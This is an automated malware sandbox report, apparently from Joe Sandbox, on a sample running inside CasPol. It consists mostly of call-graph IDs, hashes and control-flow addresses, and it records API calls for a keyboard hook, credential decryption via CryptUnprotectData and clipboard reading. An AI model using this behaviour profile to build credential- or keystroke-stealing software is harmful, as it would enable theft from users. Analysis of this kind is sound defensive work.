50404->50407 50405 1d72f764 50405->50046 50406->50405 50407->50405 50409 1d72f956 50408->50409 50410 1d72d2d8 17 API calls 50409->50410 50411 1d72f967 50410->50411 50411->50046 50413 1d72f052 50412->50413 50414 1d72d2d8 16 API calls 50413->50414 50415 1d72f060 KiUserExceptionDispatcher 50414->50415 50417 1d72f084 50415->50417 50419 208b1a10 LdrInitializeThunk 50417->50419 50420 208b1a70 LdrInitializeThunk 50417->50420 50418 1d72f764 50418->50046 50419->50418 50420->50418 50422 1d72efd1 50421->50422 50423 1d72d2d8 16 API calls 50422->50423 50424 1d72efd6 KiUserExceptionDispatcher 50423->50424 50426 1d72f084 50424->50426 50428 208b1a10 LdrInitializeThunk 50426->50428 50429 208b1a70 LdrInitializeThunk 50426->50429 50427 1d72f764 50427->50046 50428->50427 50429->50427 50431 1d72f7ee 50430->50431 50432 1d72d2d8 17 API calls 50431->50432 50433 1d72f7ff 50432->50433 50433->50046 50435 1d72f1f0 50434->50435 50436 1d72d2d8 17 API calls 50435->50436 50437 1d72f1fe 50436->50437 50439 208b1a10 LdrInitializeThunk 50437->50439 50440 208b1a70 LdrInitializeThunk 50437->50440 50438 1d72f764 50438->50046 50439->50438 50440->50438 50442 1d72f5ec 50441->50442 50443 1d72d2d8 17 API calls 50442->50443 50444 1d72f5fd 50443->50444 50446 208b1a10 LdrInitializeThunk 50444->50446 50447 208b1a70 LdrInitializeThunk 50444->50447 50445 1d72f764 50445->50046 50446->50445 50447->50445 50449 1d72f166 50448->50449 50450 1d72d2d8 17 API calls 50449->50450 50451 1d72f174 50450->50451 50453 208b1a10 LdrInitializeThunk 50451->50453 50454 208b1a70 LdrInitializeThunk 50451->50454 50452 1d72f764 50452->50046 50453->50452 50454->50452 50456 1d72f87e 50455->50456 50457 1d72d2d8 17 API calls 50456->50457 50458 1d72f88f 50457->50458 50458->50046 50460 1d72f700 50459->50460 50461 1d72d2d8 17 API calls 50460->50461 50462 1d72f711 50461->50462 50464 208b1a10 LdrInitializeThunk 50462->50464 50465 208b1a70 LdrInitializeThunk 50462->50465 50463 1d72f764 50463->50046 50464->50463 50465->50463 50467 1d72f27a 50466->50467 50468 1d72d2d8 17 API calls 50467->50468 50469 1d72f27f 50468->50469 50471 208b1a10 LdrInitializeThunk 50469->50471 50472 208b1a70 LdrInitializeThunk 50469->50472 50470 1d72f764 50470->50046 50471->50470 50472->50470 50474 1d72f37c 50473->50474 50475 1d72d2d8 17 API calls 50474->50475 50476 1d72f38a 50475->50476 50478 208b1a10 LdrInitializeThunk 50476->50478 50479 208b1a70 LdrInitializeThunk 50476->50479 50477 1d72f764 50477->50046 50478->50477 50479->50477 50481 1d72f67c 50480->50481 50482 1d72d2d8 17 API calls 50481->50482 50483 1d72f68d 50482->50483 50485 208b1a10 LdrInitializeThunk 50483->50485 50486 208b1a70 LdrInitializeThunk 50483->50486 50484 1d72f764 50484->50046 50485->50484 50486->50484 50488 1d72edf7 50487->50488 50489 1d72d2d8 16 API calls 50488->50489 50490 1d72ee05 50489->50490 50491 1d72f065 KiUserExceptionDispatcher 50490->50491 50492 1d72f084 50491->50492 50494 208b1a10 LdrInitializeThunk 50492->50494 50495 208b1a70 LdrInitializeThunk 50492->50495 50493 1d72f764 50493->50046 50494->50493 50495->50493 50497 1d72f2f2 50496->50497 50498 1d72d2d8 17 API calls 50497->50498 50499 1d72f300 50498->50499 50501 208b1a10 LdrInitializeThunk 50499->50501 50502 208b1a70 LdrInitializeThunk 50499->50502 50500 1d72f764 50500->50046 50501->50500 50502->50500 50504 1d72f90e 50503->50504 50505 1d72d2d8 17 API calls 50504->50505 50506 1d72f91f 50505->50506 50506->50046 50508 1d72f00d 50507->50508 50509 1d72d2d8 16 API calls 50508->50509 50510 1d72f01b KiUserExceptionDispatcher 50509->50510 50512 1d72f084 50510->50512 50514 208b1a10 LdrInitializeThunk 50512->50514 50515 208b1a70 LdrInitializeThunk 50512->50515 50513 1d72f764 50513->50046 50514->50513 50515->50513 50517 1d72ef8c 50516->50517 50518 1d72d2d8 16 API calls 50517->50518 50519 1d72ef9a KiUserExceptionDispatcher 50518->50519 50521 1d72f084 50519->50521 50523 208b1a10 LdrInitializeThunk 50521->50523 50524 208b1a70 LdrInitializeThunk 50521->50524 50522 1d72f764 50522->50046 50523->50522 50524->50522 50526 1d72ef0b 50525->50526 50527 1d72d2d8 16 API calls 50526->50527 50528 1d72ef19 KiUserExceptionDispatcher 50527->50528 50530 1d72f084 50528->50530 50532 208b1a10 LdrInitializeThunk 50530->50532 50533 208b1a70 LdrInitializeThunk 50530->50533 50531 1d72f764 50531->50046 50532->50531 50533->50531 50535 1d72f406 50534->50535 50536 1d72d2d8 17 API calls 50535->50536 50537 1d72f40b 50536->50537 50539 208b1a10 LdrInitializeThunk 50537->50539 50540 208b1a70 LdrInitializeThunk 50537->50540 50538 1d72f764 50538->50046 50539->50538 50540->50538 50542 208b1a8f LdrInitializeThunk 50541->50542 50544 208b1ae0 50542->50544 50544->50217 50546 208b1a31 50545->50546 50547 208b1a54 LdrInitializeThunk 50545->50547 50546->50217 50549 208b1ae0 50547->50549 50549->50217 50553 2089e4c0 SetWindowsHookExW 50550->50553 50552 2089e54a 50552->50029 50553->50552 50554 208956aa 50555 208956f8 GetModuleHandleW 50554->50555 50556 208956f2 50554->50556 50557 20895725 50555->50557 50556->50555 50558 208bb5c8 CryptUnprotectData 50559 208bb63c 50558->50559 50560 20896d6a 50561 20896d2b 50560->50561 50562 20896d77 50560->50562 50567 20896904 50561->50567 50568 2089690f 50567->50568 50579 2089693c 50568->50579 50570 20896d4a 50571 20896914 50570->50571 50572 2089691f 50571->50572 50573 2089b409 50572->50573 50575 2089b3f9 50572->50575 50595 2089a2d4 50573->50595 50583 2089b521 50575->50583 50589 2089b530 50575->50589 50576 2089b407 50580 20896947 50579->50580 50581 20894004 GetModuleHandleW 50580->50581 50582 20896f1f 50580->50582 50581->50582 50582->50570 50585 2089b530 50583->50585 50584 2089a2d4 2 API calls 50584->50585 50585->50584 50586 2089b62b 50585->50586 50602 2089bb30 50585->50602 50607 2089bb20 50585->50607 50586->50576 50591 2089b53e 50589->50591 50590 2089a2d4 2 API calls 50590->50591 50591->50590 50592 2089b62b 50591->50592 50593 2089bb20 OleGetClipboard 50591->50593 50594 2089bb30 OleGetClipboard 50591->50594 50592->50576 50593->50591 50594->50591 50596 2089a2df 50595->50596 50597 2089b74c 50596->50597 50598 2089b6a2 50596->50598 50599 20896914 OleGetClipboard 50597->50599 50600 2089b6fa CallWindowProcW 50598->50600 50601 2089b6a9 50598->50601 50599->50601 50600->50601 50601->50576 50603 2089bb3c 50602->50603 50604 2089bd56 50603->50604 50612 2089c198 50603->50612 50618 2089c1a8 50603->50618 50604->50585 50608 2089bb30 50607->50608 50609 2089bd56 50608->50609 50610 2089c198 OleGetClipboard 50608->50610 50611 2089c1a8 OleGetClipboard 50608->50611 50609->50585 50610->50608 50611->50608 50614 2089c1b0 50612->50614 50613 2089c1c4 50613->50603 50614->50613 50624 2089c1e0 50614->50624 50635 2089c1f0 50614->50635 50615 2089c1d9 50615->50603 50619 2089c1b0 50618->50619 50620 2089c1c4 50619->50620 50622 2089c1e0 OleGetClipboard 50619->50622 50623 2089c1f0 OleGetClipboard 50619->50623 50620->50603 50621 2089c1d9 50621->50603 50622->50621 50623->50621 50625 2089c202 50624->50625 50626 2089c21d 50625->50626 50628 2089c261 50625->50628 50633 2089c1e0 OleGetClipboard 50626->50633 50634 2089c1f0 OleGetClipboard 50626->50634 50627 2089c223 50627->50615 50630 2089c2e1 50628->50630 50646 2089c4a9 50628->50646 50650 2089c4b8 50628->50650 50629 2089c2ff 50629->50615 50630->50615 50633->50627 50634->50627 50636 2089c202 50635->50636 50637 2089c21d 50636->50637 50639 2089c261 50636->50639 50644 2089c1e0 OleGetClipboard 50637->50644 50645 2089c1f0 OleGetClipboard 50637->50645 50638 2089c223 50638->50615 50641 2089c2e1 50639->50641 50642 2089c4a9 OleGetClipboard 50639->50642 50643 2089c4b8 OleGetClipboard 50639->50643 50640 2089c2ff 50640->50615 50641->50615 50642->50640 50643->50640 50644->50638 50645->50638 50648 2089c4cd 50646->50648 50649 2089c4f3 50648->50649 50654 2089bf80 50648->50654 50649->50629 50652 2089c4cd 50650->50652 50651 2089bf80 OleGetClipboard 50651->50652 50652->50651 50653 2089c4f3 50652->50653 50653->50629 50655 2089c560 OleGetClipboard 50654->50655 50657 2089c5fa 50655->50657 50658 20896e40 50659 20896e57 50658->50659 50660 2089693c GetModuleHandleW 50658->50660 50660->50659 50661 111133b TerminateThread 50662 1111356 50661->50662
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (ok$(ok$(ok$(ok$(ok$(ok$(ok$,k$,k
                                                                                      • API String ID: 0-3197148070
                                                                                      • Opcode ID: 42821262fe0b3b6cfacc0ccbba0064c668ea4620217eeb1ff8d79fc170d8e6dd
                                                                                      • Instruction ID: a7fc616c7cdcd7ac16b3b40a1bbd636534f74ef94b2a161315eba803135f6311
                                                                                      • Opcode Fuzzy Hash: 42821262fe0b3b6cfacc0ccbba0064c668ea4620217eeb1ff8d79fc170d8e6dd
                                                                                      • Instruction Fuzzy Hash: 75826A30A00245CFCB14CF68D984A9EBBF2FF88314F158659E946DB2A5D739EE45CB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (ok$(ok$(ok$,k$,k$Hk
                                                                                      • API String ID: 0-3241389771
                                                                                      • Opcode ID: 267c405eea06103c664716f29d4ffcf1b67e931e45c840fdea5cf7f8dc2e6f80
                                                                                      • Instruction ID: f65652ae8268a6fd89b5e27dceef626161dd216893a321425592cda8a222627b
                                                                                      • Opcode Fuzzy Hash: 267c405eea06103c664716f29d4ffcf1b67e931e45c840fdea5cf7f8dc2e6f80
                                                                                      • Instruction Fuzzy Hash: 3272BF70A012198FDB04CFA8D894A9EBBF2FF88304F598169E915EB361DB35ED41CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 2089E53B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116066635.0000000020890000.00000040.00000800.00020000.00000000.sdmp, Offset: 20890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_20890000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: HookWindows
                                                                                      • String ID:
                                                                                      • API String ID: 2559412058-0
                                                                                      • Opcode ID: dc1abe39d2c76c3cb8d8ef0be5b97c8716688cc3578e4bba854dd5020d302687
                                                                                      • Instruction ID: 6c22daf1306098dda60a4c75ec257829b05a6811ec2635dd91790d32942d579b
                                                                                      • Opcode Fuzzy Hash: dc1abe39d2c76c3cb8d8ef0be5b97c8716688cc3578e4bba854dd5020d302687
                                                                                      • Instruction Fuzzy Hash: D22104B190020DDFCB10DF99D944BEEBBF5EB88314F10842AE559A7350DB74A945CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 208BB62D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116660956.00000000208B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 208B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_208b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: CryptDataUnprotect
                                                                                      • String ID:
                                                                                      • API String ID: 834300711-0
                                                                                      • Opcode ID: 8e80feb46272f0e5c57649525b934cbe9c332c8c26c7007496720c1c462df515
                                                                                      • Instruction ID: 9e6255029c6af87954ccb86a016e35149bccdc9b017ca78cee8eb8e7d0f88a1b
                                                                                      • Opcode Fuzzy Hash: 8e80feb46272f0e5c57649525b934cbe9c332c8c26c7007496720c1c462df515
                                                                                      • Instruction Fuzzy Hash: 131156B6800249DFCB10CF99C844BEEBFF4EF48320F148419EA58A7211C379A954DFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 208BB62D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116660956.00000000208B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 208B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_208b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: CryptDataUnprotect
                                                                                      • String ID:
                                                                                      • API String ID: 834300711-0
                                                                                      • Opcode ID: 2c749fd6034f65f5c02cd09755bd822ec6dbbc0ed3dd569ddaa8f9cd7d45de3d
                                                                                      • Instruction ID: 028c761607e5f49e72af42fe1074249cb0d8291887ec061606f693ad80b8ac0d
                                                                                      • Opcode Fuzzy Hash: 2c749fd6034f65f5c02cd09755bd822ec6dbbc0ed3dd569ddaa8f9cd7d45de3d
                                                                                      • Instruction Fuzzy Hash: 3F1134B2800249DFCB10CF99C844BEEBBF4EF48320F148419EA58A7211D379AA54DFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ef370671496a8915d9fed9309f948610bf02d1142e3b106ea8c9b1f0e106e66b
                                                                                      • Instruction ID: ef2d23275dc8da2dca3b49d7997a2786e64b62fcfa9bbac0f98e294d8b96e8ea
                                                                                      • Opcode Fuzzy Hash: ef370671496a8915d9fed9309f948610bf02d1142e3b106ea8c9b1f0e106e66b
                                                                                      • Instruction Fuzzy Hash: 3DA2C134B093814FE7068768D95479B7BB29F87344F5A80B6E649DF392DA38DC0AC712
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: adf4e3d92b45389c3ec2c0670cf497b0811f786538f6df0f8343728aee0e431f
                                                                                      • Instruction ID: 7ae90526c646a7d69e2ef912dc29f213c873abde18de88c730304584149558e7
                                                                                      • Opcode Fuzzy Hash: adf4e3d92b45389c3ec2c0670cf497b0811f786538f6df0f8343728aee0e431f
                                                                                      • Instruction Fuzzy Hash: 79F1D530B042855FEB04CBA8E89479F77B6EB89314F2584B6E549DF381DB28EC428771
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6084786549.000000001D720000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1d720000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2fe04be32e3d335ba5478e2be07b61b00014cad3f25714013a9f946eca568f00
                                                                                      • Instruction ID: 96205165d3048a40813d6a43c5a887a92d43b07f8208ffbfcfe622631ce42bc2
                                                                                      • Opcode Fuzzy Hash: 2fe04be32e3d335ba5478e2be07b61b00014cad3f25714013a9f946eca568f00
                                                                                      • Instruction Fuzzy Hash: DED067750175649FE7096B7CE98D4C43F24FE9666231516B2E085C91A2CE2B0966CA31
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 525 208b1a10-208b1a2f 526 208b1a31-208b1a3b 525->526 527 208b1a54-208b1ada LdrInitializeThunk 525->527 528 208b1a3d-208b1a4e 526->528 529 208b1a50-208b1a53 526->529 540 208b1c23-208b1c40 527->540 541 208b1ae0-208b1afa 527->541 528->529 552 208b1c45-208b1c4e 540->552 541->540 544 208b1b00-208b1b1a 541->544 548 208b1b1c-208b1b1e 544->548 549 208b1b20 544->549 550 208b1b23-208b1b7e 548->550 549->550 559 208b1b80-208b1b82 550->559 560 208b1b84 550->560 561 208b1b87-208b1c21 559->561 560->561 561->552
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116660956.00000000208B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 208B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_208b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: LRk$LRk
                                                                                      • API String ID: 2994545307-3442965990
                                                                                      • Opcode ID: fa68b44c8e57af72bc75193553377cab8997fd273b7cb64ee59a9f400df91aa9
                                                                                      • Instruction ID: dcb5fbf7589b8c69d5ccdb69106d2859fa3a721a4de08d65dfe83e0bf0bdf2ec
                                                                                      • Opcode Fuzzy Hash: fa68b44c8e57af72bc75193553377cab8997fd273b7cb64ee59a9f400df91aa9
                                                                                      • Instruction Fuzzy Hash: 7551E331B042189FCB08EBB4D884AEE77F6FF89210F548569D506DB352EF35E9058B51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 578 208b1a70-208b1ada LdrInitializeThunk 586 208b1c23-208b1c40 578->586 587 208b1ae0-208b1afa 578->587 598 208b1c45-208b1c4e 586->598 587->586 590 208b1b00-208b1b1a 587->590 594 208b1b1c-208b1b1e 590->594 595 208b1b20 590->595 596 208b1b23-208b1b7e 594->596 595->596 605 208b1b80-208b1b82 596->605 606 208b1b84 596->606 607 208b1b87-208b1c21 605->607 606->607 607->598
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116660956.00000000208B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 208B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_208b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: LRk$LRk
                                                                                      • API String ID: 2994545307-3442965990
                                                                                      • Opcode ID: 3a3bceea6db3691fe3fbc66646c0f2b7287d5621731ecdc77a7e47a189546004
                                                                                      • Instruction ID: 7cfb0d370e55da93e685b4cab838be7901ac1bf6c8573c4c69b6f8476a228d29
                                                                                      • Opcode Fuzzy Hash: 3a3bceea6db3691fe3fbc66646c0f2b7287d5621731ecdc77a7e47a189546004
                                                                                      • Instruction Fuzzy Hash: 5151F471B002189BCB08EBF4C898AAEB7F6FF89214F548929D502DB351EF31E904C791
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (ok$(ok$(ok$(ok
                                                                                      • API String ID: 0-3895995617
                                                                                      • Opcode ID: 123620a54dec52c024167fae2b67929c7615db41789cf227850857050ec6a820
                                                                                      • Instruction ID: 7774dc3cc4c17e83bcc48da1a25eca10a353286fb1d7cd97dcf667a445d865a9
                                                                                      • Opcode Fuzzy Hash: 123620a54dec52c024167fae2b67929c7615db41789cf227850857050ec6a820
                                                                                      • Instruction Fuzzy Hash: DAC13730A00249DFCB14CFA9D980A9EBBF2FF48314F558559E859EB261D735EE41CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0o/j$Dq/j$PHk
                                                                                      • API String ID: 0-1223551813
                                                                                      • Opcode ID: f0992c68ebbc7e684458d6a8559e78525cfc847bacd8c9069561335476881552
                                                                                      • Instruction ID: e284ffbf171424a77f5ee17390774cffda4b49e7d8717452f62e9990efee2052
                                                                                      • Opcode Fuzzy Hash: f0992c68ebbc7e684458d6a8559e78525cfc847bacd8c9069561335476881552
                                                                                      • Instruction Fuzzy Hash: FDA25738A002158FCB14DB68D598A9EB7F2FF89318F518569E41ADB361DB36EC46CF40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1276 1fbc5258-1fbc5746 1351 1fbc574c-1fbc575c 1276->1351 1352 1fbc5c98-1fbc5ccd 1276->1352 1351->1352 1353 1fbc5762-1fbc5772 1351->1353 1357 1fbc5ccf-1fbc5cd4 1352->1357 1358 1fbc5cd9-1fbc5cf7 1352->1358 1353->1352 1355 1fbc5778-1fbc5788 1353->1355 1355->1352 1356 1fbc578e-1fbc579e 1355->1356 1356->1352 1359 1fbc57a4-1fbc57b4 1356->1359 1360 1fbc5dbe-1fbc5dc3 1357->1360 1370 1fbc5d6e-1fbc5d7a 1358->1370 1371 1fbc5cf9-1fbc5d03 1358->1371 1359->1352 1361 1fbc57ba-1fbc57ca 1359->1361 1361->1352 1363 1fbc57d0-1fbc57e0 1361->1363 1363->1352 1364 1fbc57e6-1fbc57f6 1363->1364 1364->1352 1366 1fbc57fc-1fbc580c 1364->1366 1366->1352 1367 1fbc5812-1fbc5822 1366->1367 1367->1352 1369 1fbc5828-1fbc5c97 1367->1369 1376 1fbc5d7c-1fbc5d88 1370->1376 1377 1fbc5d91-1fbc5d9d 1370->1377 1371->1370 1375 1fbc5d05-1fbc5d11 1371->1375 1382 1fbc5d36-1fbc5d39 1375->1382 1383 1fbc5d13-1fbc5d1e 1375->1383 1376->1377 1384 1fbc5d8a-1fbc5d8f 1376->1384 1386 1fbc5d9f-1fbc5dab 1377->1386 1387 1fbc5db4-1fbc5db6 1377->1387 1388 1fbc5d3b-1fbc5d47 1382->1388 1389 1fbc5d50-1fbc5d5c 1382->1389 1383->1382 1397 1fbc5d20-1fbc5d2a 1383->1397 1384->1360 1386->1387 1395 1fbc5dad-1fbc5db2 1386->1395 1387->1360 1388->1389 1399 1fbc5d49-1fbc5d4e 1388->1399 1391 1fbc5d5e-1fbc5d65 1389->1391 1392 1fbc5dc4-1fbc5e13 call 1fbc5f88 1389->1392 1391->1392 1396 1fbc5d67-1fbc5d6c 1391->1396 1407 1fbc5e19-1fbc5e20 1392->1407 1395->1360 1396->1360 1397->1382 1405 1fbc5d2c-1fbc5d31 1397->1405 1399->1360 1405->1360 1408 1fbc5e22-1fbc5e2d 1407->1408 1409 1fbc5e33-1fbc5e3e 1407->1409 1408->1409 1416 1fbc5eb6-1fbc5f08 1408->1416 1413 1fbc5f0f-1fbc5f19 1409->1413 1414 1fbc5e44-1fbc5eb3 1409->1414 1422 1fbc5f1a-1fbc5f2f 1413->1422 1416->1413 1430 1fbc5f30-1fbc5f38 1422->1430 1430->1430 1433 1fbc5f3a-1fbc5f3c 1430->1433 1433->1422 1434 1fbc5f3e-1fbc5f4b 1433->1434 1437 1fbc5f52-1fbc5f54 1434->1437 1438 1fbc5f4d call 1fbc48c8 1434->1438 1441 1fbc5f65-1fbc5f73 1437->1441 1442 1fbc5f56-1fbc5f63 1437->1442 1438->1437 1448 1fbc5f75-1fbc5f7f 1441->1448 1449 1fbc5f81 1441->1449 1447 1fbc5f83-1fbc5f86 1442->1447 1448->1447 1449->1447
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (ok$$k$$k
                                                                                      • API String ID: 0-2203033100
                                                                                      • Opcode ID: 18938a6ec14759c1794b5ad791bde21d8cda06bbf06bcf172af3e6fb67391ea3
                                                                                      • Instruction ID: d16d7f31cd0a379148db2c90acd2747c9d6b5ef05f7be238ef6873ed20ee9a0a
                                                                                      • Opcode Fuzzy Hash: 18938a6ec14759c1794b5ad791bde21d8cda06bbf06bcf172af3e6fb67391ea3
                                                                                      • Instruction Fuzzy Hash: 36729234A052188FEB149BA0C950BDEB7B6EFC8304F11C1A9D24A6B794DF349D42DF62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1551 111133b-1111351 TerminateThread call 110868e 1553 1111356-11113b7 1551->1553 1555 11113b9-1111428 1553->1555 1556 111142b-1111466 1553->1556 1555->1556 1557 1111468-11114b3 1556->1557 1558 11114be-11114d0 1556->1558 1557->1558
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6056478740.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1100000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: TerminateThread
                                                                                      • String ID: ]o
                                                                                      • API String ID: 1852365436-2478918959
                                                                                      • Opcode ID: ca58dc35b171c2a295e622747e961677feb89798a04235dc4e8ec20c9deb4c2c
                                                                                      • Instruction ID: 8a5c15cc5c33e50011d50425861f3f56d1008f998d2307d65aebf463e2142848
                                                                                      • Opcode Fuzzy Hash: ca58dc35b171c2a295e622747e961677feb89798a04235dc4e8ec20c9deb4c2c
                                                                                      • Instruction Fuzzy Hash: 42313B3064838696FF349F788D953DB7BD1AF12B90F49426D8DC88E189E77485418703
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1560 1fbc6a90-1fbc6a96 1561 1fbc6a98-1fbc6a9e 1560->1561 1562 1fbc6ab4-1fbc6ab6 1560->1562 1563 1fbc6ab7-1fbc6ae0 1561->1563 1564 1fbc6aa0-1fbc6aa4 1561->1564 1568 1fbc6af8-1fbc6b09 1563->1568 1569 1fbc6ae2-1fbc6ae8 1563->1569 1564->1562 1565 1fbc6aa6-1fbc6aae 1564->1565 1565->1563 1566 1fbc6ab0-1fbc6ab2 1565->1566 1566->1562 1566->1565 1574 1fbc6cfc-1fbc6d10 1568->1574 1575 1fbc6b0f-1fbc6b18 1568->1575 1570 1fbc6aec-1fbc6af6 1569->1570 1571 1fbc6aea 1569->1571 1570->1568 1571->1568 1577 1fbc6d17-1fbc6d55 1574->1577 1576 1fbc6b1e-1fbc6b3e call 1fbc6460 1575->1576 1575->1577 1585 1fbc6b4c-1fbc6b52 1576->1585 1586 1fbc6b40-1fbc6b42 1576->1586 1587 1fbc6d6d-1fbc6d77 1577->1587 1588 1fbc6d57-1fbc6d59 1577->1588 1589 1fbc6b54-1fbc6b57 1585->1589 1590 1fbc6b63-1fbc6b69 1585->1590 1586->1585 1593 1fbc6d7b-1fbc6d8b 1587->1593 1591 1fbc6d5b-1fbc6d61 1588->1591 1592 1fbc6d63-1fbc6d6b 1588->1592 1596 1fbc6b5e 1589->1596 1590->1577 1594 1fbc6b6f-1fbc6b94 call 1fbc6460 1590->1594 1591->1593 1592->1593 1600 1fbc6d9c 1593->1600 1601 1fbc6d8d-1fbc6d8f 1593->1601 1606 1fbc6b96-1fbc6b99 1594->1606 1607 1fbc6ba3-1fbc6baf 1594->1607 1598 1fbc6cef-1fbc6cf6 1596->1598 1608 1fbc6da4-1fbc6dab 1600->1608 1604 1fbc6d95-1fbc6d9a 1601->1604 1605 1fbc6d91-1fbc6d93 1601->1605 1604->1608 1605->1608 1606->1607 1609 1fbc6bc1-1fbc6bc7 1607->1609 1610 1fbc6bb1-1fbc6bbc 1607->1610 1611 1fbc745d 1608->1611 1612 1fbc6db1-1fbc6db3 1608->1612 1609->1577 1613 